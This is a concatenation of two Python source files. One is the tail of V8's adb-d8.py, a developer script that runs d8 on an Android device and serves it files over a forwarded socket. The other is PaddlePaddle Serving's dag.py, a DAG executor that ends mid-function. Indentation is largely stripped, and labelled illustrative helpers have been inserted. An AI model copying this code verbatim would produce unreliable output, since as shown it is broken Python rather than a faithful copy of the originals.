def handle(self):
data = self.request.recv(1024);
while data[-1] != "\0":
data += self.request.recv(1024);
filename = data[0:-1]
try:
filename = os.path.abspath(filename)
if not any(filename.startswith(root) for root in root_dirs):
raise Exception("{} not in roots {}".format(filename, root_dirs))
if not os.path.isfile(filename):
raise Exception("{} is not a file".format(filename))
if verbose:
sys.stdout.write("Serving {}\r\n".format(os.path.relpath(filename)))
with open(filename) as f:
contents = f.read();
self.request.sendall(struct.pack("!i", len(contents)))
self.request.sendall(contents)
except Exception as e:
if verbose:
sys.stderr.write(
"Request failed ({})\n".format(e).replace('\n','\r\n'))
self.request.sendall(struct.pack("!i", -1))
return FileHandler
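# --- illustrative sketch (not part of the original script) -------------------
# Client side of the wire protocol served by FileHandler above: send a NUL
# terminated file path, read a 4 byte big-endian signed length, then the file
# contents (-1 signals an error). The host/port are assumptions; on the device
# d8 talks to the reverse-forwarded port instead.
def _ExampleRequestFile(path, host="localhost", port=4444):
  import socket
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((host, port))
  try:
    sock.sendall(path.encode() + b"\0")            # request the file
    (length,) = struct.unpack("!i", sock.recv(4))  # signed length prefix
    if length < 0:
      return None                                  # server reported an error
    contents = b""
    while len(contents) < length:
      contents += sock.recv(length - len(contents))
    return contents
  finally:
    sock.close()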
def TransferD8ToDevice(adb, build_dir, device_d8_dir, verbose):
files_to_copy = ["d8", "snapshot_blob.bin"]
# Pipe the output of md5sum from the local computer to the device, checking
# the md5 hashes on the device.
local_md5_sum_proc = subprocess.Popen(
["md5sum"] + files_to_copy,
cwd=build_dir,
stdout=subprocess.PIPE
)
device_md5_check_proc = subprocess.Popen(
[
adb, "shell",
"mkdir -p '{0}' ; cd '{0}' ; md5sum -c -".format(device_d8_dir)
],
stdin=local_md5_sum_proc.stdout,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# Push any files which failed the md5 check.
(stdoutdata, stderrdata) = device_md5_check_proc.communicate()
for line in stdoutdata.split('\n'):
if line.endswith(": FAILED"):
filename = line[:-len(": FAILED")]
if verbose:
print("Updating {}...".format(filename))
subprocess.check_call([
adb, "push",
os.path.join(build_dir, filename),
device_d8_dir
], stdout=sys.stdout if verbose else open(os.devnull, 'wb'))
def AdbForwardDeviceToLocal(adb, device_port, server_port, verbose):
if verbose:
print("Forwarding device:{} to localhost:{}...".format(
device_port, server_port))
subprocess.check_call([
adb, "reverse",
"tcp:{}".format(device_port),
"tcp:{}".format(server_port)
])
def AdbRunD8(adb, device_d8_dir, device_port, d8_args, verbose):
# Single-quote the arguments to d8, and concatenate them into a string.
d8_arg_str = " ".join("'{}'".format(a) for a in d8_args)
d8_arg_str = "--read-from-tcp-port='{}' ".format(device_port) + d8_arg_str
# Don't use os.path.join for d8 because we care about the device's os, not
# the host os.
d8_str = "{}/d8 {}".format(device_d8_dir, d8_arg_str)
if sys.stdout.isatty():
# Run adb shell with -t to have a tty if we run d8 without a script.
cmd = [adb, "shell", "-t", d8_str]
else:
cmd = [adb, "shell", d8_str]
if verbose:
print("Running {}".format(" ".join(cmd)))
return subprocess.call(cmd)
def PrintUsage(file=sys.stdout):
print("Usage: adb-d8.py [-v|--verbose] [--] <build_dir> [<d8 args>...]",
file=file)
def PrintHelp(file=sys.stdout):
print("""Usage:
adb-d8.py [options] [--] <build_dir> [<d8_args>...]
adb-d8.py -h|--help
Options:
-h|--help Show this help message and exit.
-v|--verbose Print verbose output.
--device-dir=DIR Specify which directory on the device should be used
for the d8 binary. [default: /data/local/tmp/v8]
--extra-root-dir=DIR In addition to the current directory, allow d8 to
access files inside DIR. Multiple additional roots
can be specified.
<build_dir> The directory containing the android build of d8.
<d8_args>... The arguments passed through to d8.""", file=file)
def Main():
if len(sys.argv) < 2:
PrintUsage(sys.stderr)
return 1
script_dir = os.path.dirname(sys.argv[0])
# Use the platform-tools version of adb so that we know it has the reverse
# command.
adb = os.path.join(
script_dir,
"../third_party/android_sdk/public/platform-tools/adb"
)
# Read off any command line flags before build_dir (or --). Do this
# manually, rather than using something like argparse, to be able to split
# the adb-d8 options from the passthrough d8 options.
verbose = False
device_d8_dir = '/data/local/tmp/v8'
root_dirs = []
arg_index = 1
while arg_index < len(sys.argv):
arg = sys.argv[arg_index]
if not arg.startswith("-"):
break
elif arg == "--":
arg_index += 1
break
elif arg == "-h" or arg == "--help":
PrintHelp(sys.stdout)
return 0
elif arg == "-v" or arg == "--verbose":
verbose = True
elif arg == "--device-dir":
arg_index += 1
device_d8_dir = sys.argv[arg_index]
elif arg.startswith("--device-dir="):
device_d8_dir = arg[len("--device-dir="):]
elif arg == "--extra-root-dir":
arg_index += 1
root_dirs.append(sys.argv[arg_index])
elif arg.startswith("--extra-root-dir="):
root_dirs.append(arg[len("--extra-root-dir="):])
else:
print("ERROR: Unrecognised option: {}".format(arg))
PrintUsage(sys.stderr)
return 1
arg_index += 1
# Transfer d8 (and dependencies) to the device.
build_dir = os.path.abspath(sys.argv[arg_index])
TransferD8ToDevice(adb, build_dir, device_d8_dir, verbose)
# Start a file server for the files d8 might need.
script_root_dir = os.path.abspath(os.curdir)
root_dirs.append(script_root_dir)
server = SocketServer.TCPServer(
("localhost", 0), # 0 means an arbitrary unused port.
CreateFileHandlerClass(root_dirs, verbose)
)
try:
# Start the file server in its own thread.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
# Port-forward the given device port to the file server.
# TODO(leszeks): Pick an unused device port.
# TODO(leszeks): Remove the port forwarding on exit.
server_ip, server_port = server.server_address
device_port = 4444
AdbForwardDeviceToLocal(adb, device_port, server_port, verbose)
# Run d8 over adb with the remaining arguments, using the given device
# port to forward file reads.
return AdbRunD8(
adb, device_d8_dir, device_port, sys.argv[arg_index+1:], verbose)
finally:
if verbose:
print("Shutting down file server...")
server.shutdown()
server.server_close()
if __name__ == '__main__':
sys.exit(Main())
|
dag.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import threading
import multiprocessing
import sys
import copy
if sys.version_info.major == 2:
import Queue
elif sys.version_info.major == 3:
import queue as Queue
else:
raise Exception("Error Python version")
import os
import logging
import collections
import json
from .error_catch import ErrorCatch, CustomException, CustomExceptionCode, ParamChecker, ParamVerify
from .operator import Op, RequestOp, ResponseOp, VirtualOp
from .channel import (ThreadChannel, ProcessChannel, ChannelData,
ChannelDataType, ChannelStopError)
from .error_catch import ProductErrCode
from .error_catch import CustomExceptionCode as ChannelDataErrcode
from .profiler import TimeProfiler, PerformanceTracer
from .util import NameGenerator, ThreadIdGenerator, PipelineProcSyncManager
from .proto import pipeline_service_pb2
_LOGGER = logging.getLogger(__name__)
class DAGExecutor(object):
"""
DAG Executor, the service entrance of DAG.
"""
def __init__(self, response_op, server_conf, worker_idx):
"""
Initialize DAGExecutor.
Args:
response_op: Response OP
server_conf: server conf. config.yaml
worker_idx: DAGExecutor index, PipelineServer creates many
DAGExecutors when _build_dag_each_worker is true.
Returns:
None.
"""
build_dag_each_worker = server_conf["build_dag_each_worker"]
server_worker_num = server_conf["worker_num"]
dag_conf = server_conf["dag"]
self._retry = dag_conf["retry"]
self._server_use_profile = dag_conf["use_profile"]
self._enable_prometheus = False
if "enable_prometheus" in dag_conf:
self._enable_prometheus = dag_conf["enable_prometheus"]
if "prometheus_port" in dag_conf and self._enable_prometheus:
self._prometheus_port = dag_conf["prometheus_port"]
else:
self._prometheus_port = None
channel_size = dag_conf["channel_size"]
channel_recv_frist_arrive = dag_conf["channel_recv_frist_arrive"]
self._is_thread_op = dag_conf["is_thread_op"]
tracer_conf = dag_conf["tracer"]
tracer_interval_s = tracer_conf["interval_s"]
self.name = "@DAGExecutor"
self._profiler = TimeProfiler()
self._profiler.enable(True)
self._tracer = None
if tracer_interval_s >= 1:
self._tracer = PerformanceTracer(
self._is_thread_op, tracer_interval_s, server_worker_num)
if self._enable_prometheus:
self._tracer.set_enable_dict(True)
self._dag = DAG(self.name, response_op, self._server_use_profile, self._prometheus_port,
self._is_thread_op, channel_size, build_dag_each_worker,
self._tracer, channel_recv_frist_arrive)
(in_channel, out_channel, pack_rpc_func,
unpack_rpc_func) = self._dag.build()
self._dag.start()
self._set_in_channel(in_channel)
self._set_out_channel(out_channel)
self._pack_rpc_func = pack_rpc_func
self._unpack_rpc_func = unpack_rpc_func
if self._tracer is not None:
self._tracer.start()
# generate id
# data_id: Server Unique ID, automatically generated by the framework
# log_id: Trace one product request, can be empty, not unique.
base_counter = 0
gen_id_step = 1
if build_dag_each_worker:
base_counter = worker_idx
gen_id_step = server_worker_num
self._id_generator = ThreadIdGenerator(
max_id=1000000000000000000,
base_counter=base_counter,
step=gen_id_step)
self._cv_pool = {}
self._cv_for_cv_pool = threading.Condition()
self._fetch_buffer = {}
self._recive_func = None
self._client_profile_key = "pipeline.profile"
self._client_profile_value = "1"
@ErrorCatch
def start(self):
"""
        Start one thread that receives data from the last channel in the
        background.
Args:
None
Returns:
None
"""
self._recive_func = threading.Thread(
target=DAGExecutor._recive_out_channel_func, args=(self, ))
self._recive_func.daemon = True
self._recive_func.start()
_LOGGER.debug("[DAG Executor] Start recive thread")
def stop(self):
"""
Stopping DAG
Args:
None
Returns:
None
"""
self._dag.stop()
self._dag.join()
_LOGGER.info("[DAG Executor] Stop")
def _get_next_data_id(self):
"""
        Generate a data_id incrementally and uniquely.
        Args:
            None
        Returns:
            data_id: unique id
            cond_v: condition variable
"""
data_id = self._id_generator.next()
cond_v = threading.Condition()
with self._cv_for_cv_pool:
self._cv_pool[data_id] = cond_v
self._fetch_buffer[data_id] = None
return data_id, cond_v
def _set_in_channel(self, in_channel):
"""
Set in_channel of DAG
Args:
in_channel: input channel of DAG
Returns:
None
"""
if not isinstance(in_channel, (ThreadChannel, ProcessChannel)):
_LOGGER.critical("[DAG Executor] Failed to set in_channel: "
"in_channel must be Channel type, but get {}".
format(type(in_channel)))
os._exit(-1)
self._in_channel = in_channel
_LOGGER.info("[DAG] set in channel succ, name [{}]".format(self.name))
def _set_out_channel(self, out_channel):
"""
Set out_channel of DAG
Args:
out_channel: output channel of DAG
Returns:
None
"""
if not isinstance(out_channel, (ThreadChannel, ProcessChannel)):
_LOGGER.critical("[DAG Executor] Failed to set out_channel: "
"must be Channel type, but get {}".format(
type(out_channel)))
os._exit(-1)
out_channel.add_consumer(self.name)
self._out_channel = out_channel
def _recive_out_channel_func(self):
"""
        Receiving data from the output channel and pushing it into
        _fetch_buffer. _get_channeldata_from_fetch_buffer later fetches the
        data from this buffer (a standalone sketch of this condition-variable
        handoff appears after this class).
Args:
None
Returns:
None
"""
cv = None
while True:
try:
channeldata_dict = self._out_channel.front(self.name)
except ChannelStopError:
_LOGGER.info("[DAG Executor] Stop.")
with self._cv_for_cv_pool:
for data_id, cv in self._cv_pool.items():
                        closed_error_data = ChannelData(
                            error_code=ChannelDataErrcode.CLOSED_ERROR.value,
                            error_info="dag closed.",
                            data_id=data_id)
                        with cv:
                            self._fetch_buffer[data_id] = closed_error_data
cv.notify_all()
break
if len(channeldata_dict) != 1:
_LOGGER.critical(
"[DAG Executor] Failed to fetch result: out_channel "
"cannot have multiple input ops")
os._exit(-1)
(_, channeldata), = channeldata_dict.items()
if not isinstance(channeldata, ChannelData):
                _LOGGER.critical(
                    "[DAG Executor] Failed to fetch result: data in "
                    "out_channel must be ChannelData type, but get {}"
                    .format(type(channeldata)))
os._exit(-1)
data_id = channeldata.id
_LOGGER.debug("(logid={}) [recive thread] Fetched data".format(
data_id))
with self._cv_for_cv_pool:
cond_v = self._cv_pool[data_id]
with cond_v:
self._fetch_buffer[data_id] = channeldata
cond_v.notify_all()
def _get_channeldata_from_fetch_buffer(self, data_id, cond_v):
"""
Getting the channel data from _fetch_buffer.
Args:
data_id: search key
cond_v: conditional variable
Returns:
ready_data: one channel data processed
"""
ready_data = None
with cond_v:
with self._cv_for_cv_pool:
if self._fetch_buffer[data_id] is not None:
# The requested data is already ready
ready_data = self._fetch_buffer[data_id]
self._cv_pool.pop(data_id)
self._fetch_buffer.pop(data_id)
if ready_data is None:
# Wait for data ready
cond_v.wait()
with self._cv_for_cv_pool:
ready_data = self._fetch_buffer[data_id]
self._cv_pool.pop(data_id)
self._fetch_buffer.pop(data_id)
_LOGGER.debug("(data_id={}) [resp thread] Got data".format(data_id))
return ready_data
def _pack_channeldata(self, rpc_request, data_id):
"""
        Unpack data from the RPC request and create one ChannelData.
Args:
rpc_request: one RPC request
data_id: data id, unique
Returns:
ChannelData: one channel data to be processed
"""
dictdata = None
log_id = None
try:
dictdata, log_id, prod_errcode, prod_errinfo = self._unpack_rpc_func(
rpc_request)
except Exception as e:
_LOGGER.error(
"(logid={}) Failed to parse RPC request package: {}"
.format(data_id, e),
exc_info=True)
return ChannelData(
error_code=ChannelDataErrcode.RPC_PACKAGE_ERROR.value,
error_info="rpc package error: {}".format(e),
data_id=data_id,
log_id=log_id)
else:
            # because unpack_rpc_func can be overridden by the user, we need
            # to look for prod_errcode in its return values and for the
            # client_profile_key field in rpc_request
if prod_errcode is not None:
                # product errors occurred
_LOGGER.error("unpack_rpc_func prod_errcode:{}".format(
prod_errcode))
return ChannelData(
error_code=ChannelDataErrcode.PRODUCT_ERROR.value,
error_info="",
prod_error_code=prod_errcode,
prod_error_info=prod_errinfo,
data_id=data_id,
log_id=log_id)
profile_value = None
profile_value = dictdata.get(self._client_profile_key)
client_need_profile = (profile_value == self._client_profile_value)
return ChannelData(
datatype=ChannelDataType.DICT.value,
dictdata=dictdata,
data_id=data_id,
log_id=log_id,
client_need_profile=client_need_profile)
def call(self, rpc_request):
"""
        DAGExecutor entrance function. There are 5 steps:
        1._get_next_data_id: Generate an incremental ID
        2._pack_channeldata: pack the channel data from request.
        3.retry loop:
            a. push channel_data into _in_channel
            b. get_channeldata_from_fetch_buffer: get results.
        4._pack_for_rpc_resp: pack RPC responses
        5.profile: generate profile string and pack into response.
Args:
rpc_request: one RPC request
Returns:
rpc_resp: one RPC response
"""
if self._tracer is not None:
trace_buffer = self._tracer.data_buffer()
data_id, cond_v = self._get_next_data_id()
start_call, end_call = None, None
if not self._is_thread_op:
start_call = self._profiler.record("call_{}#DAG-{}_0".format(
data_id, data_id))
else:
start_call = self._profiler.record("call_{}#DAG_0".format(data_id))
self._profiler.record("prepack_{}#{}_0".format(data_id, self.name))
req_channeldata = self._pack_channeldata(rpc_request, data_id)
self._profiler.record("prepack_{}#{}_1".format(data_id, self.name))
log_id = req_channeldata.log_id
_LOGGER.info("(data_id={} log_id={}) Succ Generate ID ".format(data_id,
log_id))
resp_channeldata = None
for i in range(self._retry):
_LOGGER.debug("(data_id={}) Pushing data into Graph engine".format(
data_id))
try:
if req_channeldata is None:
_LOGGER.critical(
"(data_id={} log_id={}) req_channeldata is None"
.format(data_id, log_id))
if not isinstance(self._in_channel,
(ThreadChannel, ProcessChannel)):
_LOGGER.critical(
"(data_id={} log_id={})[DAG Executor] Failed to "
"set in_channel: in_channel must be Channel type, but get {}".
format(data_id, log_id, type(self._in_channel)))
self._in_channel.push(req_channeldata, self.name)
except ChannelStopError:
_LOGGER.error("(data_id:{} log_id={})[DAG Executor] Stop".
format(data_id, log_id))
with self._cv_for_cv_pool:
self._cv_pool.pop(data_id)
return self._pack_for_rpc_resp(
ChannelData(
error_code=ChannelDataErrcode.CLOSED_ERROR.value,
error_info="dag closed.",
data_id=data_id))
_LOGGER.debug("(data_id={} log_id={}) Wait for Graph engine...".
format(data_id, log_id))
resp_channeldata = self._get_channeldata_from_fetch_buffer(data_id,
cond_v)
if resp_channeldata.error_code == ChannelDataErrcode.OK.value:
_LOGGER.info("(data_id={} log_id={}) Succ predict".format(
data_id, log_id))
break
else:
_LOGGER.error("(data_id={} log_id={}) Failed to predict: {}"
.format(data_id, log_id,
resp_channeldata.error_info))
if resp_channeldata.error_code != ChannelDataErrcode.TIMEOUT.value:
break
if i + 1 < self._retry:
_LOGGER.warning(
"(data_id={} log_id={}) DAGExecutor retry({}/{})"
.format(data_id, log_id, i + 1, self._retry))
_LOGGER.debug("(data_id={} log_id={}) Packing RPC response package"
.format(data_id, log_id))
self._profiler.record("postpack_{}#{}_0".format(data_id, self.name))
rpc_resp = self._pack_for_rpc_resp(resp_channeldata)
self._profiler.record("postpack_{}#{}_1".format(data_id, self.name))
if not self._is_thread_op:
end_call = self._profiler.record("call_{}#DAG-{}_1".format(data_id,
data_id))
else:
end_call = self._profiler.record("call_{}#DAG_1".format(data_id))
if self._tracer is not None:
trace_buffer.put({
"name": "DAG",
"id": data_id,
"succ":
resp_channeldata.error_code == ChannelDataErrcode.OK.value,
"actions": {
"call_{}".format(data_id): end_call - start_call,
},
})
profile_str = self._profiler.gen_profile_str()
if self._server_use_profile:
sys.stderr.write(profile_str)
# add profile info into rpc_resp
if resp_channeldata.client_need_profile:
profile_set = resp_channeldata.profile_data_set
profile_set.add(profile_str)
profile_value = "".join(list(profile_set))
rpc_resp.key.append(self._client_profile_key)
rpc_resp.value.append(profile_value)
return rpc_resp
def _pack_for_rpc_resp(self, channeldata):
"""
Packing one RPC response
Args:
channeldata: one channel data to be packed
Returns:
resp: one RPC response
"""
try:
return self._pack_rpc_func(channeldata)
except Exception as e:
_LOGGER.error(
"(logid={}) Failed to pack RPC response package: {}"
.format(channeldata.id, e),
exc_info=True)
resp = pipeline_service_pb2.Response()
resp.err_no = ChannelDataErrcode.RPC_PACKAGE_ERROR.value
resp.err_msg = "rpc package error: {}".format(e)
return resp
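# --- illustrative sketch (not part of the original module) -------------------
# Standalone illustration of the per-request condition-variable handoff used
# above by _recive_out_channel_func (producer side) and
# _get_channeldata_from_fetch_buffer (consumer side): each data_id gets its
# own Condition, the receiver thread stores the result and notifies, and the
# caller waits only on its own Condition. All names below are assumptions used
# purely for illustration.
def _example_condition_handoff():
    fetch_buffer = {}
    cv_pool = {}
    data_id = 1
    cv_pool[data_id] = threading.Condition()
    fetch_buffer[data_id] = None

    def producer():
        # stands in for the receive thread pushing a ChannelData
        cond = cv_pool[data_id]
        with cond:
            fetch_buffer[data_id] = "result"
            cond.notify_all()

    threading.Thread(target=producer).start()

    cond = cv_pool[data_id]
    with cond:
        while fetch_buffer[data_id] is None:  # guards against spurious wakeups
            cond.wait()
    cv_pool.pop(data_id)
    return fetch_buffer.pop(data_id)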
class DAG(object):
"""
Directed Acyclic Graph(DAG) engine, builds one DAG topology.
"""
def __init__(self, request_name, response_op, use_profile, prometheus_port, is_thread_op,
channel_size, build_dag_each_worker, tracer,
channel_recv_frist_arrive):
_LOGGER.info("{}, {}, {}, {}, {}, {} ,{} ,{} ,{}".format(request_name, response_op, use_profile, prometheus_port, is_thread_op,
channel_size, build_dag_each_worker, tracer,
channel_recv_frist_arrive))
@ErrorCatch
@ParamChecker
def init_helper(self, request_name: str,
response_op,
use_profile: [bool, None],
prometheus_port: [int, None],
is_thread_op: bool,
channel_size,
build_dag_each_worker: [bool, None],
tracer,
channel_recv_frist_arrive):
self._request_name = request_name
self._response_op = response_op
self._use_profile = use_profile
self._prometheus_port = prometheus_port
self._use_prometheus = (self._prometheus_port is not None)
self._is_thread_op = is_thread_op
self._channel_size = channel_size
self._build_dag_each_worker = build_dag_each_worker
self._tracer = tracer
self._channel_recv_frist_arrive = channel_recv_frist_arrive
if not self._is_thread_op:
self._manager = PipelineProcSyncManager()
init_helper(self, request_name, response_op, use_profile, prometheus_port, is_thread_op,
channel_size, build_dag_each_worker, tracer,
channel_recv_frist_arrive)
print("[DAG] Succ init")
_LOGGER.info("[DAG] Succ init")
@staticmethod
def get_use_ops(response_op):
"""
Starting from ResponseOp, recursively traverse the front OPs. Getting
all used ops and the post op list of each op (excluding ResponseOp)
Args:
response_op: ResponseOp
Returns:
used_ops: used ops, set
succ_ops_of_use_op: op and the next op list, dict.
"""
unique_names = set()
used_ops = set()
succ_ops_of_use_op = {} # {op_name: succ_ops}
que = Queue.Queue()
que.put(response_op)
while que.qsize() != 0:
op = que.get()
for pred_op in op.get_input_ops():
if pred_op.name not in succ_ops_of_use_op:
succ_ops_of_use_op[pred_op.name] = []
if op != response_op:
succ_ops_of_use_op[pred_op.name].append(op)
if pred_op not in used_ops:
que.put(pred_op)
used_ops.add(pred_op)
# check the name of op is globally unique
if pred_op.name in unique_names:
_LOGGER.critical("Failed to get used Ops: the"
" name of Op must be unique: {}".
format(pred_op.name))
os._exit(-1)
unique_names.add(pred_op.name)
return used_ops, succ_ops_of_use_op
def _gen_channel(self, name_gen):
"""
Generate one ThreadChannel or ProcessChannel.
Args:
            name_gen: channel name generator
Returns:
channel: one channel generated
"""
channel = None
if self._is_thread_op:
channel = ThreadChannel(
name=name_gen.next(),
maxsize=self._channel_size,
channel_recv_frist_arrive=self._channel_recv_frist_arrive)
else:
channel = ProcessChannel(
self._manager,
name=name_gen.next(),
maxsize=self._channel_size,
channel_recv_frist_arrive=self._channel_recv_frist_arrive)
_LOGGER.debug("[DAG] Generate channel: {}".format(channel.name))
return channel
def _gen_virtual_op(self, name_gen):
"""
Generate one virtual Op
Args:
            name_gen: Op name generator
Returns:
vir_op: one virtual Op object.
"""
vir_op = VirtualOp(name=name_gen.next())
_LOGGER.debug("[DAG] Generate virtual_op: {}".format(vir_op.name))
return vir_op
def _topo_sort(self, used_ops, response_op, out_degree_ops):
"""
        Topological sort of the DAG; creates inverted multi-layer views (a
        standalone sketch of this layering appears after this class).
        Args:
            used_ops: ops used in the DAG
            response_op: response op
            out_degree_ops: next op list for each op, dict. the output of
                get_use_ops()
        Returns:
            dag_views: the inverted hierarchical topology list. example:
                DAG: [A -> B -> C -> E]
                        \-> D ----/
                dag_views: [[E], [C, D], [B], [A]]
            last_op: the last op in front of ResponseOp
"""
out_degree_num = {
name: len(ops)
for name, ops in out_degree_ops.items()
}
que_idx = 0 # scroll queue
ques = [Queue.Queue() for _ in range(2)]
zero_indegree_num = 0
for op in used_ops:
if len(op.get_input_ops()) == 0:
zero_indegree_num += 1
if zero_indegree_num != 1:
_LOGGER.critical("Failed to topo sort: DAG contains "
"multiple RequestOps")
os._exit(-1)
last_op = response_op.get_input_ops()[0]
ques[que_idx].put(last_op)
# topo sort to get dag_views
dag_views = []
sorted_op_num = 0
while True:
que = ques[que_idx]
next_que = ques[(que_idx + 1) % 2]
dag_view = []
while que.qsize() != 0:
op = que.get()
dag_view.append(op)
sorted_op_num += 1
for pred_op in op.get_input_ops():
out_degree_num[pred_op.name] -= 1
if out_degree_num[pred_op.name] == 0:
next_que.put(pred_op)
dag_views.append(dag_view)
if next_que.qsize() == 0:
break
que_idx = (que_idx + 1) % 2
if sorted_op_num < len(used_ops):
_LOGGER.critical("Failed to topo sort: not legal DAG")
os._exit(-1)
return dag_views, last_op
def _build_dag(self, response_op):
"""
Building DAG, the most important function in class DAG. Core steps:
1.get_use_ops: Getting used ops, and out degree op list for each op.
        2._topo_sort: Topological sort creates inverted multi-layer views.
3.create channels and virtual ops.
Args:
response_op: ResponseOp
Returns:
actual_ops: all OPs used in DAG, including virtual OPs
channels: all channels used in DAG
input_channel: the channel of first OP
output_channel: the channel of last OP
pack_func: pack_response_package function of response_op
unpack_func: unpack_request_package function of request_op
"""
if response_op is None:
_LOGGER.critical("Failed to build DAG: ResponseOp"
" has not been set.")
os._exit(-1)
used_ops, out_degree_ops = DAG.get_use_ops(response_op)
if not self._build_dag_each_worker:
_LOGGER.info("================= USED OP =================")
for op in used_ops:
if not isinstance(op, RequestOp):
_LOGGER.info(op.name)
_LOGGER.info("-------------------------------------------")
if len(used_ops) <= 1:
_LOGGER.critical(
"Failed to build DAG: besides RequestOp and ResponseOp, "
"there should be at least one Op in DAG.")
os._exit(-1)
if self._build_dag_each_worker:
_LOGGER.info("Because `build_dag_each_worker` mode is used, "
"Auto-batching is set to the default config: "
"batch_size=1, auto_batching_timeout=None")
for op in used_ops:
op.use_default_auto_batching_config()
dag_views, last_op = self._topo_sort(used_ops, response_op,
out_degree_ops)
dag_views = list(reversed(dag_views))
if not self._build_dag_each_worker:
_LOGGER.info("================== DAG ====================")
for idx, view in enumerate(dag_views):
_LOGGER.info("(VIEW {})".format(idx))
for op in view:
_LOGGER.info(" [{}]".format(op.name))
for out_op in out_degree_ops[op.name]:
_LOGGER.info(" - {}".format(out_op.name))
_LOGGER.info("-------------------------------------------")
# create channels and virtual ops
virtual_op_name_gen = NameGenerator("vir")
channel_name_gen = NameGenerator("chl")
virtual_ops = []
channels = []
input_channel = None
actual_view = None
for v_idx, view in enumerate(dag_views):
if v_idx + 1 >= len(dag_views):
break
next_view = dag_views[v_idx + 1]
if actual_view is None:
actual_view = view
actual_next_view = []
pred_op_of_next_view_op = {}
for op in actual_view:
# find actual succ op in next view and create virtual op
for succ_op in out_degree_ops[op.name]:
if succ_op in next_view:
if succ_op not in actual_next_view:
actual_next_view.append(succ_op)
if succ_op.name not in pred_op_of_next_view_op:
pred_op_of_next_view_op[succ_op.name] = []
pred_op_of_next_view_op[succ_op.name].append(op)
else:
# create virtual op
virtual_op = self._gen_virtual_op(virtual_op_name_gen)
virtual_ops.append(virtual_op)
out_degree_ops[virtual_op.name] = [succ_op]
actual_next_view.append(virtual_op)
pred_op_of_next_view_op[virtual_op.name] = [op]
virtual_op.add_virtual_pred_op(op)
actual_view = actual_next_view
# create channel
processed_op = set()
for o_idx, op in enumerate(actual_next_view):
if op.name in processed_op:
continue
channel = self._gen_channel(channel_name_gen)
channels.append(channel)
op.add_input_channel(channel)
_LOGGER.info("op:{} add input channel.".format(op.name))
pred_ops = pred_op_of_next_view_op[op.name]
if v_idx == 0:
input_channel = channel
else:
# if pred_op is virtual op, it will use ancestors as producers to channel
for pred_op in pred_ops:
pred_op.add_output_channel(channel)
_LOGGER.info("pred_op:{} add output channel".format(
pred_op.name))
processed_op.add(op.name)
# find same input op to combine channel
for other_op in actual_next_view[o_idx + 1:]:
if other_op.name in processed_op:
continue
other_pred_ops = pred_op_of_next_view_op[other_op.name]
if len(other_pred_ops) != len(pred_ops):
continue
same_flag = True
for pred_op in pred_ops:
if pred_op not in other_pred_ops:
same_flag = False
break
if same_flag:
other_op.add_input_channel(channel)
processed_op.add(other_op.name)
output_channel = self._gen_channel(channel_name_gen)
channels.append(output_channel)
last_op.add_output_channel(output_channel)
_LOGGER.info("last op:{} add output channel".format(last_op.name))
pack_func, unpack_func = None, None
pack_func = response_op.pack_response_package
actual_ops = virtual_ops
for op in used_ops:
if len(op.get_input_ops()) == 0:
                # set special features of the request op:
                # 1. set unpack function.
                # 2. set output channel.
unpack_func = op.unpack_request_package
op.add_output_channel(input_channel)
continue
actual_ops.append(op)
for c in channels:
_LOGGER.debug("Channel({}):\n\t- producers: {}\n\t- consumers: {}"
.format(c.name, c.get_producers(), c.get_consumers()))
return (actual_ops, channels, input_channel, output_channel, pack_func,
unpack_func)
def get_channels(self):
return self._channels
def build(self):
"""
Interface for building one DAG outside.
Args:
None
Returns:
_input_channel: the channel of first OP
_output_channel: the channel of last OP
_pack_func: pack_response_package function of response_op
_unpack_func: unpack_request_package function of request_op
"""
(actual_ops, channels, input_channel, output_channel, pack_func,
unpack_func) = self._build_dag(self._response_op)
_LOGGER.info("[DAG] Succ build DAG")
self._actual_ops = actual_ops
self._channels = channels
self._input_channel = input_channel
self._output_channel = output_channel
self._pack_func = pack_func
self._unpack_func = unpack_func
if self._tracer is not None:
self._tracer.set_channels(self._channels)
return self._input_channel, self._output_channel, self._pack_func, self._unpack_func
def start_prom(self, prometheus_port):
import prometheus_client
from prometheus_client import Counter
from prometheus_client.core import CollectorRegistry
from flask import Response, Flask
from .prometheus_metrics import registry
from .prometheus_metrics import metric_query_success, metric_query_failure, metric_inf_count, metric_query_duration_us, metric_inf_duration_us
app = Flask(__name__)
# requests_total = Counter('c1','A counter')
@app.route("/metrics")
def requests_count():
item = self._tracer.profile_dict
_LOGGER.info("metrics: {}".format(item))
# {'uci': {'in': 727.443, 'prep': 0.5525833333333333, 'midp': 2.21375, 'postp': 1.32375, 'out': 0.9396666666666667}, 'DAG': {'call_0': 29.479, 'call_1': 8.176, 'call_2': 8.045, 'call_3': 7.988, 'call_4': 7.609, 'call_5': 7.629, 'call_6': 7.625, 'call_7': 8.32, 'call_8': 8.57, 'call_9': 8.055, 'call_10': 7.915, 'call_11': 7.873, 'query_count': 12, 'qps': 1.2, 'succ': 1.0, 'avg': 9.773666666666667, '50': 8.045, '60': 8.055, '70': 8.176, '80': 8.32, '90': 8.57, '95': 29.479, '99': 29.479}}
if "DAG" in item:
total = item["DAG"]["query_count"]
succ = total * item["DAG"]["succ"]
fail = total * (1 - item["DAG"]["succ"])
query_duration = total *item["DAG"]["avg"]
metric_query_success.inc(succ)
metric_query_failure._value.inc(fail)
metric_query_duration_us._value.inc(query_duration)
inf_cnt = 0
infer_duration = 0.0
for name in item:
if name != "DAG":
if "count" in item[name]:
inf_cnt += item[name]["count"]
if "midp" in item[name]:
infer_duration += item[name]["count"]*item[name]["midp"]
metric_inf_count._value.inc(inf_cnt)
metric_inf_duration_us._value.inc(infer_duration)
#return str(item)
self._tracer.profile_dict = {}
return Response(prometheus_client.generate_latest(registry),mimetype="text/plain")
def prom_run():
app.run(host="0.0.0.0",port=prometheus_port)
p = threading.Thread(
target=prom_run,
args=())
_LOGGER.info("Prometheus Start 2")
p.daemon = True
p.start()
def start(self):
"""
